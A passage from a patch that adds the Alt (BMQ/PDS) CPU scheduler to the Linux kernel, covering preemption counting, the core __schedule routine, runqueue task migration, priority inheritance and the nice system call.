++static inline void preempt_latency_start(int val)
++{
++	if (preempt_count() == val) {
++		unsigned long ip = get_lock_parent_ip();
++#ifdef CONFIG_DEBUG_PREEMPT
++		current->preempt_disable_ip = ip;
++#endif
++		trace_preempt_off(CALLER_ADDR0, ip);
++	}
++}
++
++void preempt_count_add(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((preempt_count() < 0)))
++		return;
++#endif
++	__preempt_count_add(val);
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Spinlock count overflowing soon?
++	 */
++	DEBUG_LOCKS_WARN_ON((preempt_count() & PREEMPT_MASK) >=
++				PREEMPT_MASK - 10);
++#endif
++	preempt_latency_start(val);
++}
++EXPORT_SYMBOL(preempt_count_add);
++NOKPROBE_SYMBOL(preempt_count_add);
++
++/*
++ * If the value passed in equals to the current preempt count
++ * then we just enabled preemption. Stop timing the latency.
++ */
++static inline void preempt_latency_stop(int val)
++{
++	if (preempt_count() == val)
++		trace_preempt_on(CALLER_ADDR0, get_lock_parent_ip());
++}
++
++void preempt_count_sub(int val)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	/*
++	 * Underflow?
++	 */
++	if (DEBUG_LOCKS_WARN_ON(val > preempt_count()))
++		return;
++	/*
++	 * Is the spinlock portion underflowing?
++	 */
++	if (DEBUG_LOCKS_WARN_ON((val < PREEMPT_MASK) &&
++			!(preempt_count() & PREEMPT_MASK)))
++		return;
++#endif
++
++	preempt_latency_stop(val);
++	__preempt_count_sub(val);
++}
++EXPORT_SYMBOL(preempt_count_sub);
++NOKPROBE_SYMBOL(preempt_count_sub);
++
++#else
++static inline void preempt_latency_start(int val) { }
++static inline void preempt_latency_stop(int val) { }
++#endif
++
++static inline unsigned long get_preempt_disable_ip(struct task_struct *p)
++{
++#ifdef CONFIG_DEBUG_PREEMPT
++	return p->preempt_disable_ip;
++#else
++	return 0;
++#endif
++}
++
++/*
++ * Print scheduling while atomic bug:
++ */
++static noinline void __schedule_bug(struct task_struct *prev)
++{
++	/* Save this before calling printk(), since that will clobber it */
++	unsigned long preempt_disable_ip = get_preempt_disable_ip(current);
++
++	if (oops_in_progress)
++		return;
++
++	printk(KERN_ERR "BUG: scheduling while atomic: %s/%d/0x%08x\n",
++		prev->comm, prev->pid, preempt_count());
++
++	debug_show_held_locks(prev);
++	print_modules();
++	if (irqs_disabled())
++		print_irqtrace_events(prev);
++	if (IS_ENABLED(CONFIG_DEBUG_PREEMPT)
++	    && in_atomic_preempt_off()) {
++		pr_err("Preemption disabled at:");
++		print_ip_sym(KERN_ERR, preempt_disable_ip);
++	}
++	if (panic_on_warn)
++		panic("scheduling while atomic\n");
++
++	dump_stack();
++	add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++}
++
++/*
++ * Various schedule()-time debugging checks and statistics:
++ */
++static inline void schedule_debug(struct task_struct *prev, bool preempt)
++{
++#ifdef CONFIG_SCHED_STACK_END_CHECK
++	if (task_stack_end_corrupted(prev))
++		panic("corrupted stack end detected inside scheduler\n");
++
++	if (task_scs_end_corrupted(prev))
++		panic("corrupted shadow stack detected inside scheduler\n");
++#endif
++
++#ifdef CONFIG_DEBUG_ATOMIC_SLEEP
++	if (!preempt && READ_ONCE(prev->__state) && prev->non_block_count) {
++		printk(KERN_ERR "BUG: scheduling in a non-blocking section: %s/%d/%i\n",
++			prev->comm, prev->pid, prev->non_block_count);
++		dump_stack();
++		add_taint(TAINT_WARN, LOCKDEP_STILL_OK);
++	}
++#endif
++
++	if (unlikely(in_atomic_preempt_off())) {
++		__schedule_bug(prev);
++		preempt_count_set(PREEMPT_DISABLED);
++	}
++	rcu_sleep_check();
++	SCHED_WARN_ON(ct_state() == CONTEXT_USER);
++
++	profile_hit(SCHED_PROFILING, __builtin_return_address(0));
++
++	schedstat_inc(this_rq()->sched_count);
++}
++
++/*
++ * Compile time debug macro
++ * #define ALT_SCHED_DEBUG
++ */
++
++#ifdef ALT_SCHED_DEBUG
++void alt_sched_debug(void)
++{
++	printk(KERN_INFO "sched: pending: 0x%04lx, idle: 0x%04lx, sg_idle: 0x%04lx\n",
++	       sched_rq_pending_mask.bits[0],
++	       sched_idle_mask->bits[0],
++	       sched_sg_idle_mask.bits[0]);
++}
++#else
++inline void alt_sched_debug(void) {}
++#endif
++
++#ifdef	CONFIG_SMP
++
++#ifdef CONFIG_PREEMPT_RT
++#define SCHED_NR_MIGRATE_BREAK 8
++#else
++#define SCHED_NR_MIGRATE_BREAK 32
++#endif
++
++const_debug unsigned int sysctl_sched_nr_migrate = SCHED_NR_MIGRATE_BREAK;
++
++/*
++ * Migrate pending tasks in @rq to @dest_cpu
++ */
++static inline int
++migrate_pending_tasks(struct rq *rq, struct rq *dest_rq, const int dest_cpu)
++{
++	struct task_struct *p, *skip = rq->curr;
++	int nr_migrated = 0;
++	int nr_tries = min(rq->nr_running / 2, sysctl_sched_nr_migrate);
++
++	while (skip != rq->idle && nr_tries &&
++	       (p = sched_rq_next_task(skip, rq)) != rq->idle) {
++		skip = sched_rq_next_task(p, rq);
++		if (cpumask_test_cpu(dest_cpu, p->cpus_ptr)) {
++			__SCHED_DEQUEUE_TASK(p, rq, 0);
++			set_task_cpu(p, dest_cpu);
++			sched_task_sanity_check(p, dest_rq);
++			__SCHED_ENQUEUE_TASK(p, dest_rq, 0);
++			nr_migrated++;
++		}
++		nr_tries--;
++	}
++
++	return nr_migrated;
++}
++
++static inline int take_other_rq_tasks(struct rq *rq, int cpu)
++{
++	struct cpumask *topo_mask, *end_mask;
++
++	if (unlikely(!rq->online))
++		return 0;
++
++	if (cpumask_empty(&sched_rq_pending_mask))
++		return 0;
++
++	topo_mask = per_cpu(sched_cpu_topo_masks, cpu) + 1;
++	end_mask = per_cpu(sched_cpu_topo_end_mask, cpu);
++	do {
++		int i;
++		for_each_cpu_and(i, &sched_rq_pending_mask, topo_mask) {
++			int nr_migrated;
++			struct rq *src_rq;
++
++			src_rq = cpu_rq(i);
++			if (!do_raw_spin_trylock(&src_rq->lock))
++				continue;
++			spin_acquire(&src_rq->lock.dep_map,
++				     SINGLE_DEPTH_NESTING, 1, _RET_IP_);
++
++			if ((nr_migrated = migrate_pending_tasks(src_rq, rq, cpu))) {
++				src_rq->nr_running -= nr_migrated;
++				if (src_rq->nr_running < 2)
++					cpumask_clear_cpu(i, &sched_rq_pending_mask);
++
++				rq->nr_running += nr_migrated;
++				if (rq->nr_running > 1)
++					cpumask_set_cpu(cpu, &sched_rq_pending_mask);
++
++				cpufreq_update_util(rq, 0);
++
++				spin_release(&src_rq->lock.dep_map, _RET_IP_);
++				do_raw_spin_unlock(&src_rq->lock);
++
++				return 1;
++			}
++
++			spin_release(&src_rq->lock.dep_map, _RET_IP_);
++			do_raw_spin_unlock(&src_rq->lock);
++		}
++	} while (++topo_mask < end_mask);
++
++	return 0;
++}
++#endif
++
++/*
++ * Timeslices below RESCHED_NS are considered as good as expired as there's no
++ * point rescheduling when there's so little time left.
++ */
++static inline void check_curr(struct task_struct *p, struct rq *rq)
++{
++	if (unlikely(rq->idle == p))
++		return;
++
++	update_curr(rq, p);
++
++	if (p->time_slice < RESCHED_NS)
++		time_slice_expired(p, rq);
++}
++
++static inline struct task_struct *
++choose_next_task(struct rq *rq, int cpu, struct task_struct *prev)
++{
++	struct task_struct *next;
++
++	if (unlikely(rq->skip)) {
++		next = rq_runnable_task(rq);
++		if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++			if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++				rq->skip = NULL;
++				schedstat_inc(rq->sched_goidle);
++				return next;
++#ifdef	CONFIG_SMP
++			}
++			next = rq_runnable_task(rq);
++#endif
++		}
++		rq->skip = NULL;
++#ifdef CONFIG_HIGH_RES_TIMERS
++		hrtick_start(rq, next->time_slice);
++#endif
++		return next;
++	}
++
++	next = sched_rq_first_task(rq);
++	if (next == rq->idle) {
++#ifdef	CONFIG_SMP
++		if (!take_other_rq_tasks(rq, cpu)) {
++#endif
++			schedstat_inc(rq->sched_goidle);
++			/*printk(KERN_INFO "sched: choose_next_task(%d) idle %px\n", cpu, next);*/
++			return next;
++#ifdef	CONFIG_SMP
++		}
++		next = sched_rq_first_task(rq);
++#endif
++	}
++#ifdef CONFIG_HIGH_RES_TIMERS
++	hrtick_start(rq, next->time_slice);
++#endif
++	/*printk(KERN_INFO "sched: choose_next_task(%d) next %px\n", cpu,
++	 * next);*/
++	return next;
++}
++
++/*
++ * Constants for the sched_mode argument of __schedule().
++ *
++ * The mode argument allows RT enabled kernels to differentiate a
++ * preemption from blocking on an 'sleeping' spin/rwlock. Note that
++ * SM_MASK_PREEMPT for !RT has all bits set, which allows the compiler to
++ * optimize the AND operation out and just check for zero.
++ */
++#define SM_NONE			0x0
++#define SM_PREEMPT		0x1
++#define SM_RTLOCK_WAIT		0x2
++
++#ifndef CONFIG_PREEMPT_RT
++# define SM_MASK_PREEMPT	(~0U)
++#else
++# define SM_MASK_PREEMPT	SM_PREEMPT
++#endif
++
++/*
++ * schedule() is the main scheduler function.
++ *
++ * The main means of driving the scheduler and thus entering this function are:
++ *
++ *   1. Explicit blocking: mutex, semaphore, waitqueue, etc.
++ *
++ *   2. TIF_NEED_RESCHED flag is checked on interrupt and userspace return
++ *      paths. For example, see arch/x86/entry_64.S.
++ *
++ *      To drive preemption between tasks, the scheduler sets the flag in timer
++ *      interrupt handler scheduler_tick().
++ *
++ *   3. Wakeups don't really cause entry into schedule(). They add a
++ *      task to the run-queue and that's it.
++ *
++ *      Now, if the new task added to the run-queue preempts the current
++ *      task, then the wakeup sets TIF_NEED_RESCHED and schedule() gets
++ *      called on the nearest possible occasion:
++ *
++ *       - If the kernel is preemptible (CONFIG_PREEMPTION=y):
++ *
++ *         - in syscall or exception context, at the next outmost
++ *           preempt_enable(). (this might be as soon as the wake_up()'s
++ *           spin_unlock()!)
++ *
++ *         - in IRQ context, return from interrupt-handler to
++ *           preemptible context
++ *
++ *       - If the kernel is not preemptible (CONFIG_PREEMPTION is not set)
++ *         then at the next:
++ *
++ *          - cond_resched() call
++ *          - explicit schedule() call
++ *          - return from syscall or exception to user-space
++ *          - return from interrupt-handler to user-space
++ *
++ * WARNING: must be called with preemption disabled!
++ */
++static void __sched notrace __schedule(unsigned int sched_mode)
++{
++	struct task_struct *prev, *next;
++	unsigned long *switch_count;
++	unsigned long prev_state;
++	struct rq *rq;
++	int cpu;
++	int deactivated = 0;
++
++	cpu = smp_processor_id();
++	rq = cpu_rq(cpu);
++	prev = rq->curr;
++
++	schedule_debug(prev, !!sched_mode);
++
++	/* by passing sched_feat(HRTICK) checking which Alt schedule FW doesn't support */
++	hrtick_clear(rq);
++
++	local_irq_disable();
++	rcu_note_context_switch(!!sched_mode);
++
++	/*
++	 * Make sure that signal_pending_state()->signal_pending() below
++	 * can't be reordered with __set_current_state(TASK_INTERRUPTIBLE)
++	 * done by the caller to avoid the race with signal_wake_up():
++	 *
++	 * __set_current_state(@state)		signal_wake_up()
++	 * schedule()				  set_tsk_thread_flag(p, TIF_SIGPENDING)
++	 *					  wake_up_state(p, state)
++	 *   LOCK rq->lock			    LOCK p->pi_state
++	 *   smp_mb__after_spinlock()		    smp_mb__after_spinlock()
++	 *     if (signal_pending_state())	    if (p->state & @state)
++	 *
++	 * Also, the membarrier system call requires a full memory barrier
++	 * after coming from user-space, before storing to rq->curr.
++	 */
++	raw_spin_lock(&rq->lock);
++	smp_mb__after_spinlock();
++
++	update_rq_clock(rq);
++
++	switch_count = &prev->nivcsw;
++	/*
++	 * We must load prev->state once (task_struct::state is volatile), such
++	 * that we form a control dependency vs deactivate_task() below.
++	 */
++	prev_state = READ_ONCE(prev->__state);
++	if (!(sched_mode & SM_MASK_PREEMPT) && prev_state) {
++		if (signal_pending_state(prev_state, prev)) {
++			WRITE_ONCE(prev->__state, TASK_RUNNING);
++		} else {
++			prev->sched_contributes_to_load =
++				(prev_state & TASK_UNINTERRUPTIBLE) &&
++				!(prev_state & TASK_NOLOAD) &&
++				!(prev->flags & TASK_FROZEN);
++
++			if (prev->sched_contributes_to_load)
++				rq->nr_uninterruptible++;
++
++			/*
++			 * __schedule()			ttwu()
++			 *   prev_state = prev->state;    if (p->on_rq && ...)
++			 *   if (prev_state)		    goto out;
++			 *     p->on_rq = 0;		  smp_acquire__after_ctrl_dep();
++			 *				  p->state = TASK_WAKING
++			 *
++			 * Where __schedule() and ttwu() have matching control dependencies.
++			 *
++			 * After this, schedule() must not care about p->state any more.
++			 */
++			sched_task_deactivate(prev, rq);
++			deactivate_task(prev, rq);
++			deactivated = 1;
++
++			if (prev->in_iowait) {
++				atomic_inc(&rq->nr_iowait);
++				delayacct_blkio_start();
++			}
++		}
++		switch_count = &prev->nvcsw;
++	}
++
++	check_curr(prev, rq);
++
++	next = choose_next_task(rq, cpu, prev);
++	clear_tsk_need_resched(prev);
++	clear_preempt_need_resched();
++#ifdef CONFIG_SCHED_DEBUG
++	rq->last_seen_need_resched_ns = 0;
++#endif
++
++	if (likely(prev != next)) {
++		if (deactivated)
++			update_sched_preempt_mask(rq);
++		next->last_ran = rq->clock_task;
++		rq->last_ts_switch = rq->clock;
++
++		rq->nr_switches++;
++		/*
++		 * RCU users of rcu_dereference(rq->curr) may not see
++		 * changes to task_struct made by pick_next_task().
++		 */
++		RCU_INIT_POINTER(rq->curr, next);
++		/*
++		 * The membarrier system call requires each architecture
++		 * to have a full memory barrier after updating
++		 * rq->curr, before returning to user-space.
++		 *
++		 * Here are the schemes providing that barrier on the
++		 * various architectures:
++		 * - mm ? switch_mm() : mmdrop() for x86, s390, sparc, PowerPC.
++		 *   switch_mm() rely on membarrier_arch_switch_mm() on PowerPC.
++		 * - finish_lock_switch() for weakly-ordered
++		 *   architectures where spin_unlock is a full barrier,
++		 * - switch_to() for arm64 (weakly-ordered, spin_unlock
++		 *   is a RELEASE barrier),
++		 */
++		++*switch_count;
++
++		psi_sched_switch(prev, next, !task_on_rq_queued(prev));
++
++		trace_sched_switch(sched_mode & SM_MASK_PREEMPT, prev, next, prev_state);
++
++		/* Also unlocks the rq: */
++		rq = context_switch(rq, prev, next);
++	} else {
++		__balance_callbacks(rq);
++		raw_spin_unlock_irq(&rq->lock);
++	}
++
++#ifdef CONFIG_SCHED_SMT
++	sg_balance(rq);
++#endif
++}
++
++void __noreturn do_task_dead(void)
++{
++	/* Causes final put_task_struct in finish_task_switch(): */
++	set_special_state(TASK_DEAD);
++
++	/* Tell freezer to ignore us: */
++	current->flags |= PF_NOFREEZE;
++
++	__schedule(SM_NONE);
++	BUG();
++
++	/* Avoid "noreturn function does return" - but don't continue if BUG() is a NOP: */
++	for (;;)
++		cpu_relax();
++}
++
++static inline void sched_submit_work(struct task_struct *tsk)
++{
++	unsigned int task_flags;
++
++	if (task_is_running(tsk))
++		return;
++
++	task_flags = tsk->flags;
++	/*
++	 * If a worker goes to sleep, notify and ask workqueue whether it
++	 * wants to wake up a task to maintain concurrency.
++	 */
++	if (task_flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (task_flags & PF_WQ_WORKER)
++			wq_worker_sleeping(tsk);
++		else
++			io_wq_worker_sleeping(tsk);
++	}
++
++	/*
++	 * spinlock and rwlock must not flush block requests.  This will
++	 * deadlock if the callback attempts to acquire a lock which is
++	 * already acquired.
++	 */
++	SCHED_WARN_ON(current->__state & TASK_RTLOCK_WAIT);
++
++	/*
++	 * If we are going to sleep and we have plugged IO queued,
++	 * make sure to submit it to avoid deadlocks.
++	 */
++	blk_flush_plug(tsk->plug, true);
++}
++
++static void sched_update_worker(struct task_struct *tsk)
++{
++	if (tsk->flags & (PF_WQ_WORKER | PF_IO_WORKER)) {
++		if (tsk->flags & PF_WQ_WORKER)
++			wq_worker_running(tsk);
++		else
++			io_wq_worker_running(tsk);
++	}
++}
++
++asmlinkage __visible void __sched schedule(void)
++{
++	struct task_struct *tsk = current;
++
++	sched_submit_work(tsk);
++	do {
++		preempt_disable();
++		__schedule(SM_NONE);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++	sched_update_worker(tsk);
++}
++EXPORT_SYMBOL(schedule);
++
++/*
++ * synchronize_rcu_tasks() makes sure that no task is stuck in preempted
++ * state (have scheduled out non-voluntarily) by making sure that all
++ * tasks have either left the run queue or have gone into user space.
++ * As idle tasks do not do either, they must not ever be preempted
++ * (schedule out non-voluntarily).
++ *
++ * schedule_idle() is similar to schedule_preempt_disable() except that it
++ * never enables preemption because it does not call sched_submit_work().
++ */
++void __sched schedule_idle(void)
++{
++	/*
++	 * As this skips calling sched_submit_work(), which the idle task does
++	 * regardless because that function is a nop when the task is in a
++	 * TASK_RUNNING state, make sure this isn't used someplace that the
++	 * current task can be in any other state. Note, idle is always in the
++	 * TASK_RUNNING state.
++	 */
++	WARN_ON_ONCE(current->__state);
++	do {
++		__schedule(SM_NONE);
++	} while (need_resched());
++}
++
++#if defined(CONFIG_CONTEXT_TRACKING_USER) && !defined(CONFIG_HAVE_CONTEXT_TRACKING_USER_OFFSTACK)
++asmlinkage __visible void __sched schedule_user(void)
++{
++	/*
++	 * If we come here after a random call to set_need_resched(),
++	 * or we have been woken up remotely but the IPI has not yet arrived,
++	 * we haven't yet exited the RCU idle mode. Do it here manually until
++	 * we find a better solution.
++	 *
++	 * NB: There are buggy callers of this function.  Ideally we
++	 * should warn if prev_state != CONTEXT_USER, but that will trigger
++	 * too frequently to make sense yet.
++	 */
++	enum ctx_state prev_state = exception_enter();
++	schedule();
++	exception_exit(prev_state);
++}
++#endif
++
++/**
++ * schedule_preempt_disabled - called with preemption disabled
++ *
++ * Returns with preemption disabled. Note: preempt_count must be 1
++ */
++void __sched schedule_preempt_disabled(void)
++{
++	sched_preempt_enable_no_resched();
++	schedule();
++	preempt_disable();
++}
++
++#ifdef CONFIG_PREEMPT_RT
++void __sched notrace schedule_rtlock(void)
++{
++	do {
++		preempt_disable();
++		__schedule(SM_RTLOCK_WAIT);
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++}
++NOKPROBE_SYMBOL(schedule_rtlock);
++#endif
++
++static void __sched notrace preempt_schedule_common(void)
++{
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		__schedule(SM_PREEMPT);
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++
++		/*
++		 * Check again in case we missed a preemption opportunity
++		 * between schedule and now.
++		 */
++	} while (need_resched());
++}
++
++#ifdef CONFIG_PREEMPTION
++/*
++ * This is the entry point to schedule() from in-kernel preemption
++ * off of preempt_enable.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule(void)
++{
++	/*
++	 * If there is a non-zero preempt_count or interrupts are disabled,
++	 * we do not want to preempt the current task. Just return..
++	 */
++	if (likely(!preemptible()))
++		return;
++
++	preempt_schedule_common();
++}
++NOKPROBE_SYMBOL(preempt_schedule);
++EXPORT_SYMBOL(preempt_schedule);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_dynamic_enabled
++#define preempt_schedule_dynamic_enabled	preempt_schedule
++#define preempt_schedule_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule, preempt_schedule_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule);
++void __sched notrace dynamic_preempt_schedule(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule))
++		return;
++	preempt_schedule();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule);
++EXPORT_SYMBOL(dynamic_preempt_schedule);
++#endif
++#endif
++
++/**
++ * preempt_schedule_notrace - preempt_schedule called by tracing
++ *
++ * The tracing infrastructure uses preempt_enable_notrace to prevent
++ * recursion and tracing preempt enabling caused by the tracing
++ * infrastructure itself. But as tracing can happen in areas coming
++ * from userspace or just about to enter userspace, a preempt enable
++ * can occur before user_exit() is called. This will cause the scheduler
++ * to be called when the system is still in usermode.
++ *
++ * To prevent this, the preempt_enable_notrace will use this function
++ * instead of preempt_schedule() to exit user context if needed before
++ * calling the scheduler.
++ */
++asmlinkage __visible void __sched notrace preempt_schedule_notrace(void)
++{
++	enum ctx_state prev_ctx;
++
++	if (likely(!preemptible()))
++		return;
++
++	do {
++		/*
++		 * Because the function tracer can trace preempt_count_sub()
++		 * and it also uses preempt_enable/disable_notrace(), if
++		 * NEED_RESCHED is set, the preempt_enable_notrace() called
++		 * by the function tracer will call this function again and
++		 * cause infinite recursion.
++		 *
++		 * Preemption must be disabled here before the function
++		 * tracer can trace. Break up preempt_disable() into two
++		 * calls. One to disable preemption without fear of being
++		 * traced. The other to still record the preemption latency,
++		 * which can also be traced by the function tracer.
++		 */
++		preempt_disable_notrace();
++		preempt_latency_start(1);
++		/*
++		 * Needs preempt disabled in case user_exit() is traced
++		 * and the tracer calls preempt_enable_notrace() causing
++		 * an infinite recursion.
++		 */
++		prev_ctx = exception_enter();
++		__schedule(SM_PREEMPT);
++		exception_exit(prev_ctx);
++
++		preempt_latency_stop(1);
++		preempt_enable_no_resched_notrace();
++	} while (need_resched());
++}
++EXPORT_SYMBOL_GPL(preempt_schedule_notrace);
++
++#ifdef CONFIG_PREEMPT_DYNAMIC
++#if defined(CONFIG_HAVE_PREEMPT_DYNAMIC_CALL)
++#ifndef preempt_schedule_notrace_dynamic_enabled
++#define preempt_schedule_notrace_dynamic_enabled	preempt_schedule_notrace
++#define preempt_schedule_notrace_dynamic_disabled	NULL
++#endif
++DEFINE_STATIC_CALL(preempt_schedule_notrace, preempt_schedule_notrace_dynamic_enabled);
++EXPORT_STATIC_CALL_TRAMP(preempt_schedule_notrace);
++#elif defined(CONFIG_HAVE_PREEMPT_DYNAMIC_KEY)
++static DEFINE_STATIC_KEY_TRUE(sk_dynamic_preempt_schedule_notrace);
++void __sched notrace dynamic_preempt_schedule_notrace(void)
++{
++	if (!static_branch_unlikely(&sk_dynamic_preempt_schedule_notrace))
++		return;
++	preempt_schedule_notrace();
++}
++NOKPROBE_SYMBOL(dynamic_preempt_schedule_notrace);
++EXPORT_SYMBOL(dynamic_preempt_schedule_notrace);
++#endif
++#endif
++
++#endif /* CONFIG_PREEMPTION */
++
++/*
++ * This is the entry point to schedule() from kernel preemption
++ * off of irq context.
++ * Note, that this is called and return with irqs disabled. This will
++ * protect us against recursive calling from irq.
++ */
++asmlinkage __visible void __sched preempt_schedule_irq(void)
++{
++	enum ctx_state prev_state;
++
++	/* Catch callers which need to be fixed */
++	BUG_ON(preempt_count() || !irqs_disabled());
++
++	prev_state = exception_enter();
++
++	do {
++		preempt_disable();
++		local_irq_enable();
++		__schedule(SM_PREEMPT);
++		local_irq_disable();
++		sched_preempt_enable_no_resched();
++	} while (need_resched());
++
++	exception_exit(prev_state);
++}
++
++int default_wake_function(wait_queue_entry_t *curr, unsigned mode, int wake_flags,
++			  void *key)
++{
++	WARN_ON_ONCE(IS_ENABLED(CONFIG_SCHED_DEBUG) && wake_flags & ~WF_SYNC);
++	return try_to_wake_up(curr->private, mode, wake_flags);
++}
++EXPORT_SYMBOL(default_wake_function);
++
++static inline void check_task_changed(struct task_struct *p, struct rq *rq)
++{
++	int idx;
++
++	/* Trigger resched if task sched_prio has been modified. */
++	if (task_on_rq_queued(p) && (idx = task_sched_prio_idx(p, rq)) != p->sq_idx) {
++		requeue_task(p, rq, idx);
++		check_preempt_curr(rq);
++	}
++}
++
++static void __setscheduler_prio(struct task_struct *p, int prio)
++{
++	p->prio = prio;
++}
++
++#ifdef CONFIG_RT_MUTEXES
++
++static inline int __rt_effective_prio(struct task_struct *pi_task, int prio)
++{
++	if (pi_task)
++		prio = min(prio, pi_task->prio);
++
++	return prio;
++}
++
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	struct task_struct *pi_task = rt_mutex_get_top_task(p);
++
++	return __rt_effective_prio(pi_task, prio);
++}
++
++/*
++ * rt_mutex_setprio - set the current priority of a task
++ * @p: task to boost
++ * @pi_task: donor task
++ *
++ * This function changes the 'effective' priority of a task. It does
++ * not touch ->normal_prio like __setscheduler().
++ *
++ * Used by the rt_mutex code to implement priority inheritance
++ * logic. Call site only calls if the priority of the task changed.
++ */
++void rt_mutex_setprio(struct task_struct *p, struct task_struct *pi_task)
++{
++	int prio;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	/* XXX used to be waiter->prio, not waiter->task->prio */
++	prio = __rt_effective_prio(pi_task, p->normal_prio);
++
++	/*
++	 * If nothing changed; bail early.
++	 */
++	if (p->pi_top_task == pi_task && prio == p->prio)
++		return;
++
++	rq = __task_access_lock(p, &lock);
++	/*
++	 * Set under pi_lock && rq->lock, such that the value can be used under
++	 * either lock.
++	 *
++	 * Note that there is loads of tricky to make this pointer cache work
++	 * right. rt_mutex_slowunlock()+rt_mutex_postunlock() work together to
++	 * ensure a task is de-boosted (pi_task is set to NULL) before the
++	 * task is allowed to run again (and can exit). This ensures the pointer
++	 * points to a blocked task -- which guarantees the task is present.
++	 */
++	p->pi_top_task = pi_task;
++
++	/*
++	 * For FIFO/RR we only need to set prio, if that matches we're done.
++	 */
++	if (prio == p->prio)
++		goto out_unlock;
++
++	/*
++	 * Idle task boosting is a nono in general. There is one
++	 * exception, when PREEMPT_RT and NOHZ is active:
++	 *
++	 * The idle task calls get_next_timer_interrupt() and holds
++	 * the timer wheel base->lock on the CPU and another CPU wants
++	 * to access the timer (probably to cancel it). We can safely
++	 * ignore the boosting request, as the idle CPU runs this code
++	 * with interrupts disabled and will complete the lock
++	 * protected section without being interrupted. So there is no
++	 * real need to boost.
++	 */
++	if (unlikely(p == rq->idle)) {
++		WARN_ON(p != rq->curr);
++		WARN_ON(p->pi_blocked_on);
++		goto out_unlock;
++	}
++
++	trace_sched_pi_setprio(p, pi_task);
++
++	__setscheduler_prio(p, prio);
++
++	check_task_changed(p, rq);
++out_unlock:
++	/* Avoid rq from going away on us: */
++	preempt_disable();
++
++	__balance_callbacks(rq);
++	__task_access_unlock(p, lock);
++
++	preempt_enable();
++}
++#else
++static inline int rt_effective_prio(struct task_struct *p, int prio)
++{
++	return prio;
++}
++#endif
++
++void set_user_nice(struct task_struct *p, long nice)
++{
++	unsigned long flags;
++	struct rq *rq;
++	raw_spinlock_t *lock;
++
++	if (task_nice(p) == nice || nice < MIN_NICE || nice > MAX_NICE)
++		return;
++	/*
++	 * We have to be careful, if called from sys_setpriority(),
++	 * the task might be in the middle of scheduling on another CPU.
++	 */
++	raw_spin_lock_irqsave(&p->pi_lock, flags);
++	rq = __task_access_lock(p, &lock);
++
++	p->static_prio = NICE_TO_PRIO(nice);
++	/*
++	 * The RT priorities are set via sched_setscheduler(), but we still
++	 * allow the 'normal' nice value to be set - but as expected
++	 * it won't have any effect on scheduling until the task is
++	 * not SCHED_NORMAL/SCHED_BATCH:
++	 */
++	if (task_has_rt_policy(p))
++		goto out_unlock;
++
++	p->prio = effective_prio(p);
++
++	check_task_changed(p, rq);
++out_unlock:
++	__task_access_unlock(p, lock);
++	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
++}
++EXPORT_SYMBOL(set_user_nice);
++
++/*
++ * is_nice_reduction - check if nice value is an actual reduction
++ *
++ * Similar to can_nice() but does not perform a capability check.
++ *
++ * @p: task
++ * @nice: nice value
++ */
++static bool is_nice_reduction(const struct task_struct *p, const int nice)
++{
++	/* Convert nice value [19,-20] to rlimit style value [1,40]: */
++	int nice_rlim = nice_to_rlimit(nice);
++
++	return (nice_rlim <= task_rlimit(p, RLIMIT_NICE));
++}
++
++/*
++ * can_nice - check if a task can reduce its nice value
++ * @p: task
++ * @nice: nice value
++ */
++int can_nice(const struct task_struct *p, const int nice)
++{
++	return is_nice_reduction(p, nice) || capable(CAP_SYS_NICE);
++}
++
++#ifdef __ARCH_WANT_SYS_NICE
++
++/*
++ * sys_nice - change the priority of the current process.
++ * @increment: priority increment
++ *
++ * sys_setpriority is a more generic, but much slower function that
++ * does similar things.
++ */
++SYSCALL_DEFINE1(nice, int, increment)
++{
++	long nice, retval;
++
++	/*
++	 * Setpriority might change our priority at the same moment.
++	 * We don't have to worry. Conceptually one call occurs first
++	 * and we have a single winner.
++	 */
++
++	increment = clamp(increment, -NICE_WIDTH, NICE_WIDTH);
++	nice = task_nice(current) + increment;
++
++	nice = clamp_val(nice, MIN_NICE, MAX_NICE);
++	if (increment < 0 && !can_nice(current, nice))
++		return -EPERM;
++
++	retval = security_task_setnice(current, nice);
++	if (retval)
++		return retval;
++
++	set_user_nice(current, nice);
++	return 0;
++}
++
++#endif
++
++/**
++ * task_prio - return the priority value of a given task.
++ * @p: the task in question.
++ *
++ * Return: The priority value as seen by users in /proc.
++ *
++ * sched policy         return value   kernel prio    user prio/nice
++ *
++ * (BMQ)normal, batch, idle[0 ... 53]  [100 ... 139]          0/[-20 ... 19]/[-7 ... 7]
++ * (PDS)normal, batch, idle[0 ... 39]            100          0/[-20 ... 19]
++ * fifo, rr             [-1 ... -100]     [99 ... 0]  [0 ... 99]
++ */
